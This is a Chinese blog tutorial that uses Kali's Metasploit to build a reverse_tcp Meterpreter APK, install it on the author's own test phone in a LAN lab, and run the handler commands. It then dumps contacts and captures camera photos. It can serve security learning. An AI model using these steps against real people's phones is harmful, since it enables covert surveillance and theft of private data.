Kali Linux-MSF远控局域网手机
前言
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
本文目的:演示如何借助Kali Linux
系统的Metasploit
渗透测试框架生成远程控制程序,然后感染局域网内的Android手机,从而实现对目标手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。
环境说明
机器 | IP地址 |
---|---|
Win10 物理主机 | 192.168.0.105 |
Kali 虚拟机 | 192.168.0.199 |
honor 8 测试手机 | 192.168.0.107 |
Win10主机和手机应连接同一个WIFI,Kali虚拟机安装在VMware中,使用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网。
关于如何配置虚拟机的IP和网络,请访问另一篇博文:渗透测试-Kali虚拟机。
环境准备
远控生成
1、先说点废话,来确认下 Kali 虚拟机配置好的IP地址:
2、在 Kali 终端输入以下命令在 Kali 虚拟机/root
路径下生成远控文件520.apk
:
传输远控
远控文件已经生成了,但如何从 Kali 虚拟机传输到 Win10 物理主机并进一步传输到受害者手机呢?
1、使用Xshell远程连接工具,新建如下SFTP协议的文件传输会话:
2、同时配置好与远程 Kali 主机对接的本地文件夹,用于 Win 10 主机传输文件的默认存放路径:
3、输入 kali 主机的账户和密码进行登陆并成功连接后,使用命令get 520.apk
从Kali 主机下载远控文件到本地文件夹D:\Code
下:
4、在 Win 10 主机本地文件夹确认下文件是否下载成功:
安装远控
1、再废话一下,查看并确认华为测试手机的IP地址与 Kali 虚拟机、Win 10主机在同一网段内:
2、在 Kali 虚拟机里查看能否连通手机(这是后续攻击成功的基础):
3、在 Win 10 主机打开QQ程序,向华为手机发送远控文件并安装(这个就不用演示了吧…),安装后如下:
开始测试
MSF监听
Kali 终端依次执行以下命令:
msfconsole //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.199 //这里的地址设置成我们刚才生成木马的IP地址
set lport 9999 //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞,开始监听,等待手机上线
1、在 Kali 终端输入msfconsole
命令启动Metasploit
框架:
2、依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:
3、执行命令exploit
,开始执行攻击程序,进入监听状态,等待目标手机上线(用户点击远控程序):
4、此时手动点击刚才手机中安装的MainActivity
程序图标(没有界面),则可成功建立攻击会话:
5、此时输入help
命令可查看具体的攻击命令和描述,后面将选择几个进行演示:
命令行执行
成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作:
通讯录下载
1、在攻击会话中执行dump_contacts
命令导出受害者手机通讯录里的信息到 Kali 虚拟机/root
路径下:
2、在虚拟机中查看一下导出来的通讯录文件:
3、同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。
摄像机拍摄
在攻击会话中执行命令webcam_snap
,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中:
同理还可以非法调用受害者手机的录音功能、屏幕截图功能……
至此,本次Kali系统生成远控程序后控制局域网内Android手机的演示结束,其他控制操作读者有兴趣的话可自行借助help
命令给出的使用命令描述进行体验。
温馨提醒:此次演示中的远控程序没有图形化界面的伪装,真实的环境中攻击者会将其伪装得跟正常软件一样,这提醒了我们不要轻易安装安全性未知的软件,同时不要轻易连接公共WIFI,让自己的设备暴露在攻击者搭建的局域网下……
Kali Linux-MSF远控局域网手机相关推荐
- Kali Linux 学习日记6 - 局域网攻击
文章目录 交换机工作原理 MAC地址泛洪攻击 MAC地址欺骗攻击 DHCP工作原理 DHCP攻击 ARP攻击 交换机工作原理 1.交换机中有一个MAC地址表,里面是端口与MAC的对应.初始状态下,交换 ...
- 使用Kali linux生成木马入侵局域网安卓手机
1.首先查看本机ip,这里我本机IP地址为192.168.0.105 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip ...
- Kali Linux使用MSF木马入侵安卓手机
声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正. 一.环境准备 Kali Linux 安卓手机一部(安卓11) 二.内网穿透 要想玩的好,总不能本地玩自己吧 ...
- 运用树莓派+kali linux绕过wifi登录认证系统
本文仅供学习,请勿用于任何违法行为 引言 现在很多地方都有公共wifi,但是很烦人的是很多免费wifi都需要登陆认证,那种微信认证还好,至少能用,但是在某些地方,比如校园内,往往需要正确的账号密码才能 ...
- kali linux之选择和修改exp与windows后渗透
网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......) ...
- 第11节 Kali Linux系统网络信息查看与配置
目录 0 引言 1 实验一:为Kali配置临时网络信息 1.1 查看系统网卡信息和已有IP地址 1.2 关闭networkmanager服务 1.3 配置IP地址 1.4 配置网关与DNS 1.5 其 ...
- msf之msfvenom的使用—使用Kali渗透工具生成远控木马
一.先解释一下 msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线. (注意:msfvenom是在shell里使用的 ...
- Kali Linux利用MSF入侵安卓手机(小白版超详细)
Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执行文 ...
- Kali Linux利用MSF入侵安卓手机(零基础版超详细)
Kali Linux利用MSF入侵安卓手机 文章目录 Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfc ...
- linux常用免杀,【kali linux】详细分析两个免杀远控 了解远控和免杀原理
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 Hi 大家好 我是杰爱蓝莓 今天起跟大家从源代码分析两个免杀的远控 让大家能够了解远控程序的原理,以及免杀技术实现的一些原理 两个远控 1:用Python ...
最新文章
- EJS 什么是EJS后缀文件 EJS怎么用
- 个人的web开发心得(八)----------非常适合入门新手,都是常识
- Java正确获取客户端真实IP方法整理
- 三面美团Java岗,尚学堂java马士兵全套
- 递归原来可以so easy|-连载(3)
- android 多线程概述
- java并发AtomicIntegerArray
- PyTorch深度学习快速实战入门《pytorch-handbook》
- PyCharm切换Python版本
- 入侵他人电脑四个步骤_增长的七个步骤利用数据入侵您的业务
- 台达内部速度指令_台达PLC连续脉冲输出如何控制速度
- apple id两步验证服务器,【安全可靠】Apple ID 两步验证支持中国地区 - 爱应用
- Delphi程序破解技术概要
- 在英伟达 jeason nano配置yolov5
- 揭密巴西Banrisul银行网站遭遇5小时劫持的原因
- 快手小程序担保支付php源码封装
- SAP VF11冲销发票BADI
- 数说故事与华为云签署全面合作协议,共同升级数字世界营销新体验
- 32位MCU外扩SRAM芯片VTI7064MSME
- 数字图像处理(2):图像反相(分别用C语言、OpenCV、Matlab实现)